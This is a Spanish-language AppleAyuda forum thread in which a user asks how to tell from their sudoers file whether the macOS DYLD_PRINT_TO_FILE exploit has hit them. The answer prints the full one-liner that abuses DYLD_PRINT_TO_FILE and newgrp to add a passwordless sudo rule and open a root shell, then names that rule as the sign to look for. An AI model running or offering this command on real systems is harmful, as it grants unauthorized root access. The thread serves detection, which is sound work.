0 votos

DYLD_PRINT_TO_FILE & sudoers Exploit: ¿Cuáles son los marcadores en el archivo sudoers?

Me preocupa el exploit DYLD_PRINT_TO_FILE en el archivo sudoers.

https://blog.malwarebytes.org/mac/2015/08/dyld_print_to_file-exploit-found-in-the-wild/

Si tengo el archivo sudoers abierto, ¿cuáles son los marcadores que debería buscar como señal de infección? Mi archivo sudoers es en realidad bastante pequeño y para mi ojo (casi inexperto), no veo nada que sea preocupante. Pero, ¿cuáles son algunos ejemplos de líneas/variables que podrían indicar un problema?

Aquí está la mitad inferior de mi archivo, no hay nada que me llame la atención. ¿Qué opinas?

# User privilege specification
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL

# Uncomment to allow people in group wheel to run all commands
# %wheel    ALL=(ALL) ALL

# Same thing without a password
# %wheel    ALL=(ALL) NOPASSWD: ALL

# Samples
# %users  ALL=/sbin/mount /cdrom,/sbin/umount /cdrom
# %users  localhost=/sbin/shutdown -h now

1voto

hjdm Puntos 18

Este es el comando infeccioso:

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

Esto significa, que usted tendrá línea como:

USERNAME ALL=(ALL) NOPASSWD:ALL

al final de su sudoers archivo.

NOTA: USERNAME es su nombre de usuario en el sistema. No tendrá hashtag # al frente.

AppleAyuda.com

AppleAyuda es una comunidad de usuarios de los productos de Apple en la que puedes resolver tus problemas y dudas.
Puedes consultar las preguntas de otros usuarios, hacer tus propias preguntas o resolver las de los demás.

Powered by:

X